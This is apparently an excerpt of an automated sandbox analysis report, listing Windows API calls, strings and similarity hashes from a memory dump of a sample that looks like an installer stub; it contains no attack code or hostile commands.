                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00FD712B
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00FD713B
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FD7A24
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetLastError.KERNEL32 ref: 00FD7A6A
                                                                                                                                                                              • Part of subcall function 00FD7A15: CloseHandle.KERNEL32(?), ref: 00FD7A79
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00FD7146
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FD7254
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00FD7280
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FD7292
                                                                                                                                                                            • GetLastError.KERNEL32(00000015,00000000,?), ref: 00FD72A2
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00FD72EE
                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00FD7316
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                            • API String ID: 3935142422-3508440684
                                                                                                                                                                            • Opcode ID: 1858dab79c7655ad748ace5194a5fea376af42cb9f47b926b727d89857c4c9a9
                                                                                                                                                                            • Instruction ID: 21f962c77b64fb4308c6ca32e2a18607dd71b8e620a634ce3bcddfe1d4e679be
                                                                                                                                                                            • Opcode Fuzzy Hash: 1858dab79c7655ad748ace5194a5fea376af42cb9f47b926b727d89857c4c9a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 22B1F571D043589FEB21EF64CC45BEE73B9AF04300F08459AF959EB242E778AA45DB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceW.KERNEL32(00000066,PNG,?,?,00FEA54A,00000066), ref: 00FE964B
                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,75295780,?,?,00FEA54A,00000066), ref: 00FE9663
                                                                                                                                                                            • LoadResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9676
                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9681
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,00FEA54A,00000066), ref: 00FE969F
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00FE96AC
                                                                                                                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FE9707
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00FE971C
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00FE9723
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                                                                                                                            • String ID: PNG
                                                                                                                                                                            • API String ID: 4097654274-364855578
                                                                                                                                                                            • Opcode ID: 63c0aec16542c280e0c628a1b89b4422a05f6dae2631abd055b156dfd378f5d3
                                                                                                                                                                            • Instruction ID: 63096f75a57ae91f4366040c8075823b217f77016dcd250ed0bda1df41e9ae11
                                                                                                                                                                            • Opcode Fuzzy Hash: 63c0aec16542c280e0c628a1b89b4422a05f6dae2631abd055b156dfd378f5d3
                                                                                                                                                                            • Instruction Fuzzy Hash: F021A075514302ABC3329F22DC88E6B7BA9EF957A0F00052DF98182214DB66CC04EBB1
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FF7CD9
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FF7CE3
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00FF7CF0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 3906539128-3080146196
                                                                                                                                                                            • Opcode ID: 769a42bdff6af22051e1559c0fdf794279fd8f60bf6ae4a98e3fe4bd8e2d101b
                                                                                                                                                                            • Instruction ID: 61e9166097779cc2609c8c9cd29ddfd537e598c64c8403b8ab72284a85c634ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 769a42bdff6af22051e1559c0fdf794279fd8f60bf6ae4a98e3fe4bd8e2d101b
                                                                                                                                                                            • Instruction Fuzzy Hash: 4531D374D0121C9BCB21DF64DC88B9CBBB8AF18310F5041EAE50CA7251E7349B818F44
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FE9DBF
                                                                                                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0100D600,?,?), ref: 00FE9E0E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2169056816-0
                                                                                                                                                                            • Opcode ID: 97747d27ed589ef5ebf6c28ee1f401b75f509d8b084b3062edbe822531127e90
                                                                                                                                                                            • Instruction ID: 70f34a888089d9d58ba7060e6ed7943d96855cec6f3badfd13c533dafe0168e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 97747d27ed589ef5ebf6c28ee1f401b75f509d8b084b3062edbe822531127e90
                                                                                                                                                                            • Instruction Fuzzy Hash: FA017C39510218BADB219FE4DC49FABB7BCEF19710F104462FA8897240D37699248BE5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(00FE0DE0,?,00000200), ref: 00FD6D06
                                                                                                                                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FD6D27
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                            • Opcode ID: b55747957a92aa102474ae2e217c60a821512fb6c3d1d7609e6f0d4951837291
                                                                                                                                                                            • Instruction ID: 734ad63b5684a8dfcb0f3b5b3d69ed2c4e5c56ff055d41305e9c67934642fc3a
                                                                                                                                                                            • Opcode Fuzzy Hash: b55747957a92aa102474ae2e217c60a821512fb6c3d1d7609e6f0d4951837291
                                                                                                                                                                            • Instruction Fuzzy Hash: 18D0A931388302BEFA221A309C0AF2AB793B715B82F20C900B382E80C1C6719014E728
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001E64F,00FEE084), ref: 00FEE648
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: 4a275c9cb019fc680249dc2db4eccf7f36963e5208621d40fd216a6888475ae2
                                                                                                                                                                            • Instruction ID: 1a237c7449e11aaf7f6d04b1c69003ca823b44e49b8ddb957ff5e103c2644f0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a275c9cb019fc680249dc2db4eccf7f36963e5208621d40fd216a6888475ae2
                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                            • Opcode ID: 927456ec0821c866c07ecd703f70625c34c4743046359c5fdf06d265c405398c
                                                                                                                                                                            • Instruction ID: 84b7398a49580d5153faa6724777b27b39d139da04f13dfd726ff674515d7468
                                                                                                                                                                            • Opcode Fuzzy Hash: 927456ec0821c866c07ecd703f70625c34c4743046359c5fdf06d265c405398c
                                                                                                                                                                            • Instruction Fuzzy Hash: CBA02230203200CF83208F30A30C30C3AECBA08EC0B088028B2C8C200CEB3EC0A08B00
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FEB4CC
                                                                                                                                                                              • Part of subcall function 00FEA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FEA21E
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00FEADDF,?,00000000), ref: 00FEB601
                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00FEB6AE
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00FEB6BB
                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00FEB6C9
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00FEB812
                                                                                                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 00FEB99C
                                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00FEB9D7
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00FEB9E7
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,01019602), ref: 00FEB9FB
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FEBA24
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
                                                                                                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                            • API String ID: 764735972-312220925
                                                                                                                                                                            • Opcode ID: fac150af4180f52cc7530703700ccc4f679f1c437dd6a67f4125fa4bc2843b0d
                                                                                                                                                                            • Instruction ID: 7e7a70f08da8b207d90203351b5a5d91c8cdc9749d6c0c7cf17e680929aa1d35
                                                                                                                                                                            • Opcode Fuzzy Hash: fac150af4180f52cc7530703700ccc4f679f1c437dd6a67f4125fa4bc2843b0d
                                                                                                                                                                            • Instruction Fuzzy Hash: 0EE18272C00259AAEF21EBA1DD85EEF737CAF44350F0440A6F649E7151EF749B849BA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FDD731
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                              • Part of subcall function 00FE11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,01010078,?,00FDCE91,00000000,?,00000050,01010078), ref: 00FE1217
                                                                                                                                                                            • _strlen.LIBCMT ref: 00FDD752
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0100D154,?), ref: 00FDD7B2
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FDD7EC
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00FDD7F8
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00FDD896
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FDD8C3
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00FDD906
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00FDD90E
                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 00FDD919
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00FDD946
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00FDD9B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                            • String ID: $%s:$CAPTION$d
                                                                                                                                                                            • API String ID: 2407758923-2512411981
                                                                                                                                                                            • Opcode ID: 654ce9b0b20c5e6518b03df21c0bc3e61241b3f202e6f70470771c65b9d669ab
                                                                                                                                                                            • Instruction ID: c78518c9263e3ee2eaebab38757445edc68a19818c91db8075d9a67538ca2874
                                                                                                                                                                            • Opcode Fuzzy Hash: 654ce9b0b20c5e6518b03df21c0bc3e61241b3f202e6f70470771c65b9d669ab
                                                                                                                                                                            • Instruction Fuzzy Hash: DE81B171508305AFD721DFA8CD84B6FBBE9EB88714F08491EFA84D3284D635E809DB52
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00FFB7C8
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB380
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB392
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3A4
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3B6
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3C8
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3DA
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3EC
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3FE
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB410
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB422
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB434
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB446
                                                                                                                                                                              • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB458
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB7BD
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB7DF
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB7F4
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB7FF
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB821
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB834
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB842
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB84D
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB885
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB88C
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB8A9
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB8C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                            • Opcode ID: 40e31e645cdc9901ba780204fc5ca6a8cfe9db70eecc7e82575e016245878da3
                                                                                                                                                                            • Instruction ID: f30705159148803d92b473f5f515ad68981f701cabbdef3b9bd25fffb6ab4507
                                                                                                                                                                            • Opcode Fuzzy Hash: 40e31e645cdc9901ba780204fc5ca6a8cfe9db70eecc7e82575e016245878da3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E318D31A043099FEB20AA78DC45B7AB3E8EF417A0F114429E259D71B1DF38AD91E724
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 00FEC364
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00FEC393
                                                                                                                                                                              • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00FEC3B1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FEC3C8
                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00FEC3DB
                                                                                                                                                                              • Part of subcall function 00FE958C: GetDC.USER32(00000000), ref: 00FE9598
                                                                                                                                                                              • Part of subcall function 00FE958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FE95A7
                                                                                                                                                                              • Part of subcall function 00FE958C: ReleaseDC.USER32(00000000,00000000), ref: 00FE95B5
                                                                                                                                                                              • Part of subcall function 00FE9549: GetDC.USER32(00000000), ref: 00FE9555
                                                                                                                                                                              • Part of subcall function 00FE9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00FE9564
                                                                                                                                                                              • Part of subcall function 00FE9549: ReleaseDC.USER32(00000000,00000000), ref: 00FE9572
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FEC402
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00FEC409
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00FEC412
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                                                                                            • String ID: STATIC
                                                                                                                                                                            • API String ID: 1444658586-1882779555
                                                                                                                                                                            • Opcode ID: 5213091526e578c1e9d90b0da4d4091a14f415490eded06630d5e5246e695bc2
